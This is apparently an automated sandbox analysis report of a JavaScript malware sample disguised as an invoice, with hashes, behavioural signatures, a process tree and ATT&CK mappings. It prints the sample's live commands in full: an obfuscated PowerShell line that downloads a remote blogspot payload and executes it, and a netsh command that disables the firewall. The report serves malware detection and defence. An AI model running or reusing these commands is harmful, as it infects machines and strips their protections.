Analysis
-
max time kernel
143s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20231127-en -
resource tags
arch:x64arch:x86image:win10v2004-20231127-enlocale:en-usos:windows10-2004-x64system -
submitted
01-12-2023 05:58
Static task
static1
Behavioral task
behavioral1
Sample
invoice_2566246817.js
Resource
win10v2004-20231127-en
General
-
Target
invoice_2566246817.js
-
Size
106KB
-
MD5
fc6d7a11059fee2eda2bab5e4c82c839
-
SHA1
9907895c521bddd02573ca5e361490f017932dbe
-
SHA256
39afb67d0916e6761f7604cb65ebdb1c115f24e62d9b122c0137b46215a0b00c
-
SHA512
1e820c22e9cbd0f360b7187eb8062089ead22cfd1a62e0e47450523659b841bf37278ddfd530c4792529d88145ceb1ff88389d541fda9e68d9c127ba5579fb39
-
SSDEEP
384:boJdyttnpXrov4gPyjjF/9sui+1VaEEEfEfffEfEffESxyOVYZPjcrdRoDT/8W8z:kS5W
Malware Config
Signatures
-
Processes:
powershell.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" powershell.exe -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 7 2780 powershell.exe 13 2780 powershell.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3455265224-196869244-2056873367-1000\Control Panel\International\Geo\Nation wscript.exe -
Registers COM server for autorun 1 TTPs 2 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3455265224-196869244-2056873367-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3455265224-196869244-2056873367-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3455265224-196869244-2056873367-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Deefenasdensossl1 = "schtasks /run /tn Deefenasdensossl1" powershell.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 38 api.ipify.org 39 api.ipify.org -
Suspicious use of SetThreadContext 3 IoCs
Processes:
powershell.exedescription pid process target process PID 2780 set thread context of 4596 2780 powershell.exe RegSvcs.exe PID 2780 set thread context of 60 2780 powershell.exe RegSvcs.exe PID 2780 set thread context of 652 2780 powershell.exe Msbuild.exe -
Drops file in Windows directory 1 IoCs
Processes:
dw20.exedescription ioc process File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp dw20.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
dw20.exedw20.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
dw20.exedw20.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe -
Modifies registry class 3 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3455265224-196869244-2056873367-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3455265224-196869244-2056873367-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" powershell.exe Key created \REGISTRY\USER\S-1-5-21-3455265224-196869244-2056873367-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} powershell.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.exeRegSvcs.exepid process 2780 powershell.exe 2780 powershell.exe 2780 powershell.exe 2780 powershell.exe 2780 powershell.exe 2780 powershell.exe 2780 powershell.exe 4596 RegSvcs.exe 4596 RegSvcs.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exedw20.exedw20.exeRegSvcs.exedescription pid process Token: SeDebugPrivilege 2780 powershell.exe Token: SeIncreaseQuotaPrivilege 2780 powershell.exe Token: SeSecurityPrivilege 2780 powershell.exe Token: SeTakeOwnershipPrivilege 2780 powershell.exe Token: SeLoadDriverPrivilege 2780 powershell.exe Token: SeSystemProfilePrivilege 2780 powershell.exe Token: SeSystemtimePrivilege 2780 powershell.exe Token: SeProfSingleProcessPrivilege 2780 powershell.exe Token: SeIncBasePriorityPrivilege 2780 powershell.exe Token: SeCreatePagefilePrivilege 2780 powershell.exe Token: SeBackupPrivilege 2780 powershell.exe Token: SeRestorePrivilege 2780 powershell.exe Token: SeShutdownPrivilege 2780 powershell.exe Token: SeDebugPrivilege 2780 powershell.exe Token: SeSystemEnvironmentPrivilege 2780 powershell.exe Token: SeRemoteShutdownPrivilege 2780 powershell.exe Token: SeUndockPrivilege 2780 powershell.exe Token: SeManageVolumePrivilege 2780 powershell.exe Token: 33 2780 powershell.exe Token: 34 2780 powershell.exe Token: 35 2780 powershell.exe Token: 36 2780 powershell.exe Token: SeRestorePrivilege 636 dw20.exe Token: SeBackupPrivilege 636 dw20.exe Token: SeRestorePrivilege 2924 dw20.exe Token: SeBackupPrivilege 2924 dw20.exe Token: SeBackupPrivilege 2924 dw20.exe Token: SeBackupPrivilege 636 dw20.exe Token: SeBackupPrivilege 636 dw20.exe Token: SeBackupPrivilege 636 dw20.exe Token: SeBackupPrivilege 2924 dw20.exe Token: SeBackupPrivilege 2924 dw20.exe Token: SeDebugPrivilege 4596 RegSvcs.exe Token: SeIncreaseQuotaPrivilege 2780 powershell.exe Token: SeSecurityPrivilege 2780 powershell.exe Token: SeTakeOwnershipPrivilege 2780 powershell.exe Token: SeLoadDriverPrivilege 2780 powershell.exe Token: SeSystemProfilePrivilege 2780 powershell.exe Token: SeSystemtimePrivilege 2780 powershell.exe Token: SeProfSingleProcessPrivilege 2780 powershell.exe Token: SeIncBasePriorityPrivilege 2780 powershell.exe Token: SeCreatePagefilePrivilege 2780 powershell.exe Token: SeBackupPrivilege 2780 powershell.exe Token: SeRestorePrivilege 2780 powershell.exe Token: SeShutdownPrivilege 2780 powershell.exe Token: SeDebugPrivilege 2780 powershell.exe Token: SeSystemEnvironmentPrivilege 2780 powershell.exe Token: SeRemoteShutdownPrivilege 2780 powershell.exe Token: SeUndockPrivilege 2780 powershell.exe Token: SeManageVolumePrivilege 2780 powershell.exe Token: 33 2780 powershell.exe Token: 34 2780 powershell.exe Token: 35 2780 powershell.exe Token: 36 2780 powershell.exe Token: SeIncreaseQuotaPrivilege 2780 powershell.exe Token: SeSecurityPrivilege 2780 powershell.exe Token: SeTakeOwnershipPrivilege 2780 powershell.exe Token: SeLoadDriverPrivilege 2780 powershell.exe Token: SeSystemProfilePrivilege 2780 powershell.exe Token: SeSystemtimePrivilege 2780 powershell.exe Token: SeProfSingleProcessPrivilege 2780 powershell.exe Token: SeIncBasePriorityPrivilege 2780 powershell.exe Token: SeCreatePagefilePrivilege 2780 powershell.exe Token: SeBackupPrivilege 2780 powershell.exe -
Suspicious use of WriteProcessMemory 38 IoCs
Processes:
wscript.exepowershell.execsc.exeMsbuild.exeRegSvcs.exedescription pid process target process PID 1748 wrote to memory of 2780 1748 wscript.exe powershell.exe PID 1748 wrote to memory of 2780 1748 wscript.exe powershell.exe PID 2780 wrote to memory of 4448 2780 powershell.exe csc.exe PID 2780 wrote to memory of 4448 2780 powershell.exe csc.exe PID 4448 wrote to memory of 2200 4448 csc.exe cvtres.exe PID 4448 wrote to memory of 2200 4448 csc.exe cvtres.exe PID 2780 wrote to memory of 2644 2780 powershell.exe netsh.exe PID 2780 wrote to memory of 2644 2780 powershell.exe netsh.exe PID 2780 wrote to memory of 4596 2780 powershell.exe RegSvcs.exe PID 2780 wrote to memory of 4596 2780 powershell.exe RegSvcs.exe PID 2780 wrote to memory of 4596 2780 powershell.exe RegSvcs.exe PID 2780 wrote to memory of 4596 2780 powershell.exe RegSvcs.exe PID 2780 wrote to memory of 4596 2780 powershell.exe RegSvcs.exe PID 2780 wrote to memory of 4596 2780 powershell.exe RegSvcs.exe PID 2780 wrote to memory of 4596 2780 powershell.exe RegSvcs.exe PID 2780 wrote to memory of 4596 2780 powershell.exe RegSvcs.exe PID 2780 wrote to memory of 60 2780 powershell.exe RegSvcs.exe PID 2780 wrote to memory of 60 2780 powershell.exe RegSvcs.exe PID 2780 wrote to memory of 60 2780 powershell.exe RegSvcs.exe PID 2780 wrote to memory of 60 2780 powershell.exe RegSvcs.exe PID 2780 wrote to memory of 60 2780 powershell.exe RegSvcs.exe PID 2780 wrote to memory of 60 2780 powershell.exe RegSvcs.exe PID 2780 wrote to memory of 60 2780 powershell.exe RegSvcs.exe PID 2780 wrote to memory of 60 2780 powershell.exe RegSvcs.exe PID 2780 wrote to memory of 652 2780 powershell.exe Msbuild.exe PID 2780 wrote to memory of 652 2780 powershell.exe Msbuild.exe PID 2780 wrote to memory of 652 2780 powershell.exe Msbuild.exe PID 2780 wrote to memory of 652 2780 powershell.exe Msbuild.exe PID 2780 wrote to memory of 652 2780 powershell.exe Msbuild.exe PID 2780 wrote to memory of 652 2780 powershell.exe Msbuild.exe PID 2780 wrote to memory of 652 2780 powershell.exe Msbuild.exe PID 2780 wrote to memory of 652 2780 powershell.exe Msbuild.exe PID 652 wrote to memory of 2924 652 Msbuild.exe dw20.exe PID 652 wrote to memory of 2924 652 Msbuild.exe dw20.exe PID 652 wrote to memory of 2924 652 Msbuild.exe dw20.exe PID 60 wrote to memory of 636 60 RegSvcs.exe dw20.exe PID 60 wrote to memory of 636 60 RegSvcs.exe dw20.exe PID 60 wrote to memory of 636 60 RegSvcs.exe dw20.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\invoice_2566246817.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1748 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c $((irm hotelofficeewn.blogspot.com////////////////////////////////////atom.xml) | .('{1}{0}'-f'kasokdaoskdoaksodkasodkaoskdoaksdoaksod','I').replace('kasokdaoskdoaksodkasodkaoskdoaksdoaksod','ex'))2⤵
- UAC bypass
- Blocklisted process makes network request
- Registers COM server for autorun
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2780 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\aw0eaotw\aw0eaotw.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:4448 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES93A5.tmp" "c:\Users\Admin\AppData\Local\Temp\aw0eaotw\CSC946AF703D23C4F11987A705B173E971.TMP"4⤵PID:2200
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off -ErrorAction SilentlyContinue3⤵
- Modifies Windows Firewall
PID:2644 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4596 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:60 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7764⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:636 -
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:652 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7804⤵
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:2924
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
1Windows Service
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
1Windows Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD520e3dcb2b6b8e1de0336649d60d31d4a
SHA1a4fbf4c33a1a06a922125737ab4cced3a0b2379c
SHA2561ed166709a7a70d7d6b4965ff126e1c057d8762abc4aa6f0429a857c1ddb565c
SHA5122aa241bb49b9d48e7cb4f23480c127be1edabbaecbbea339af6ea4ac075a8a4593671efb9a0530efb1550a82a5490b392f98fc07ffa02b5877498ec76c4f89b4
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD567f719de074a517e1bb6713f13bef1aa
SHA131ce156883971fe28fc655b61bed8dca3ffb3089
SHA256c943d5f43de2899addfa4dfca6065b020cfc312b80bc144549eb3f4449c2a7c5
SHA512d84f04198137f0e1a8063109dd75454aa9189074bd8d6fb4b5e10cdd2b1c644290c1b902710bc09bff0cc125bd03fd1bc79ada25542964db571c55fa5f369384
-
Filesize
652B
MD57c2666ca5c957e0c3d2f17744125d3c3
SHA12bbf972ed9ce73de79bcd9b1bd15b30af1313e52
SHA256136dd22b6132641c6421052be1baa30d7df7bbd6941aebe2171dbb8d02bf12a2
SHA5127aad7b0e865ed9d75523d2a7dcd6ef2bfbd8726e56bcf8be17378e68cb70fba1d7170d6ecffb2ae926afa46834f1e7eadd0f0cd553659b57b1cfac0ae5bddadd
-
Filesize
870B
MD5e06ebf853695db38aaac82c9af297ae4
SHA1ef98bacec5ac2ae3bf24aac8ed56935a25c1f064
SHA25679c1099bad1dccb1d151887071b8e8b5d679de343903895fa28e45b791cae344
SHA512036449d932066d506a6bd7c08df311bf1ed5e7b3595004941fe1c39a8e9f9b0d08d43b33a180d4851f88d49c98a17b05cf5235858ada611306fc602cfd582759
-
Filesize
369B
MD51f0bf0fc43b74dd075a6be9ab9b8bb65
SHA1191db5efcf9a1fe8264598f6d2d2019d2d39d499
SHA25694288fd41758d099ae7ca02e3fdef7d7690e35330ed5e585ea4e98ded33e0ec2
SHA512ec316afd6467d19ad11c64c9112350cb0009a461cda022b0680d017060763faab0782f40ee15f82b9dfb9933e4a6c0f3d993e2a6a88730671327397daeabacd7